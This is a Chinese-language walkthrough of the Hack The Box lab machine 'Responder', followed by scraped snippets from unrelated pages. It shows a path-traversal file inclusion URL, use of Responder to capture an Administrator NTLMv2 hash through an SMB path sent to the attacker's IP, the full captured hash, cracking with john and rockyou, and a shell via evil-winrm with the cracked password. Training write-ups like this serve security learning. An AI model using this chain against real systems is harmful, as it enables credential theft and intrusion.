Hacker The Box 之 Responder 7
第一题
第二题
echo "10.129.99.77 unika.htb" | sudo tee -a /etc/hosts
关于页面跳转的一个技巧
可以修改hosts文件禁止这种跳转,以kali为例,首先编辑/etc/hosts文件,添加一下IP地址和跳转的地址
本题原理在 /etc/hosts 文件中添加此条目将使浏览器能够将主机名 unika.htb 解析为相应的 IP 地址 & 从而使浏览器包含 HTTP 标头 Host: unika.htb 在每个浏览器向该 IP 地址发送的 HTTP 请求,这将使服务器响应unika.htb 的网页
第三题
第四题
第五题
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
第六题
第七题
第八题
第九题
第十题
安装Responder
git pull https://github.com/lgandx/Responder
如果git发生报错,fatal: 不是 git 仓库(或者任何父目录):.git
只需要 git init就可以解决
验证 Responder.conf 是否设置为侦听 SMB 请求。
responder -I tun0 开始监听
并访问http://unika.htb/?page=//10.10.15.174/somefile
这的IP是连接openvpn后的,不是机子的IP
成功获取HaX
echo "Administrator::DESKTOP-
H3OF232:1122334455667788:7E0A87A2CCB487AD9B76C7B0AEAEE133:0101000000000000005F3214B534D
801F0E8BB688484C96C0000000002000800420044004F00320001001E00570049004E002D004E0048004500
3800440049003400410053004300510004003400570049004E002D004E00480045003800440049003400410
05300430051002E00420044004F0032002E004C004F00430041004C0003001400420044004F0032002E004C
004F00430041004C0005001400420044004F0032002E004C004F00430041004C0007000800005F3214B534D
801060004000200000008003000300000000000000001000000002000000C2FAF941D04DCECC6A7691EA926
30A77E073056DA8C3F356D47C324C6D6D16F0A0010000000000000000000000000000000000009002000630
06900660073002F00310030002E00310030002E00310034002E00320035000000000000000000" > hash.txt
将haxh导入txt中,准备用john爆破
john --w=/usr/share/wordlists/rockyou.txt.gz hash.txt 开膛手爆破
第十一题
第十二题
最后get shell就好evil-winrm -i 10.129.99.77 -u administrator -p badminton
Hacker The Box 之 Responder 7相关推荐
- hack the box靶场responder靶机
打开靶机,看第一个问题: 问:机器上跑了几个tcp端口? 回答:3个,才开始使用默认扫描方式只扫出来一个80,后来指定了端口返回,扫出来三个端口,分别是80.5985.7680,使用如下命令扫描 nm ...
- WPS如何制作流程图
WPS如何制作流程图 随着可视化分析的普及,我们工作中有越来越多需要利用流程图或者思维导图反应事件的发展历程,利用直观的图像式思维工具,让工作内容一目了然. 制作流程图的软件很多,常用的是Visio软 ...
- Hack the box -- Responder靶机
这个靶机记录一下..感觉会用到. 任务1 当使用IP地址访问web服务时,我们被重定向到的域是什么? 这里我们访问一下ip,然后重定向了 FLAG:unika.htb 任务2 服务器上使用哪种脚本语言 ...
- Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder
涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称.基于Web服务管理(WS-Management)标准,使用80或 ...
- 给 perl hacker 们看的(ReShip)
究竟有多少种打印出 just another perl hacker 的方法呢? 看看就知道了 :-) %% #JoeCamel on http://www.perlmonks.com/ #note: ...
- Pentest BOX安装和使用
Pentest Box:渗透测试盒子,是一款Windows平台下预配置的便携式开源渗透测试环境,而它也是著名黑客Kapustkiy常用的工具之一.这里集成的大都是Linux下的工具,Kali Linu ...
- 10个简单的hacker加速你在Python中的数据分析
10个简单的hacker技术加速你在Python中的数据分析 来源 技巧和窍门,特别是在编程领域,可以非常有用.有时,一个小黑客既可以节省时间,也可以挽救生命.一个小的快捷方式或附加功能有时会被证明是 ...
- Hacker Fest: 2019-Walkthrough【VulnHub靶场】渗透测试实战系列3
靶场地址:Hacker Fest: 2019 这个靶场在CTF中的等级是easy,作者也提供了一些线索,所以比较适合小伙伴们独立完成. 这个题目是两阶段flag标志获取,普通用户和root分别有fla ...
- So you want to be a Hacker?(所以你想成为黑客?)
本文翻译原文:http://www.treeyhub.com/topics/133/so-you-want-to-be-a-hacker 原文链接:https://netsec.ws/?p=468 最 ...
最新文章
- nodejs获取当前url和url参数值
- Java黑皮书课后题第5章:5.5(千克与磅之间的互换)编写一个程序,并排显示下面两个表格
- java调用arcgis rest服务器_c#调用arcgis地图rest服务示例详解(arcgis地图输出)
- Linux 中的零拷贝技术
- nn.dropout()的用法,随机失活
- contact form 7如何设置placeholder让提示文字显示在输入框中
- 软件测试的错误优先级,软件测试典型错误
- 微软官网下载各版本VS的地址
- thinkphp3.1.3框架手册
- logit方程怎么写_家长也能看懂的“一元一次方程解法”,请大家收藏给孩子看!...
- android轮播图简单实现(左右无限滑动,自动轮播)
- Golang bytes源码分析
- Unity3D合成大西瓜
- 图解卡尔曼滤波(Kalman Filter)
- 《富爸爸、穷爸爸1》-01
- Leetcode刷题笔记之11. 盛最多水的容器
- 服务器无线网卡无法启动不了怎么办,wifi共享精灵启动不了怎么办
- android vivavideo_vivavideo官网版
- win7 aero效果选项为灰色的处理方法
- wps姓名隐藏为星号_wps表格怎么把重要数字隐藏用星号显示?
热门文章
- Keil5打开工程提示not found device解决方法
- 互联网——一场没有硝烟的战争,字节跳动VS腾讯
- 计算机专业用全能本,2020年4款全能型笔记本电脑推荐,一款更比一款强,拼的都是实力...
- 关于 Data Lake 的概念、架构与应用场景介绍
- 开源项目—FLutter开发录音APP
- Openwrt内网穿透NPS(新路由3d)
- 哈哈,真实山穷水尽疑无路,柳暗花明又一村啊
- 如何用好28335的sci fifo(不使用中断)
- Springboot毕设项目海鲜配送管理系统q3m5ujava+VUE+Mybatis+Maven+Mysql+sprnig)
- 简单网页表格制作html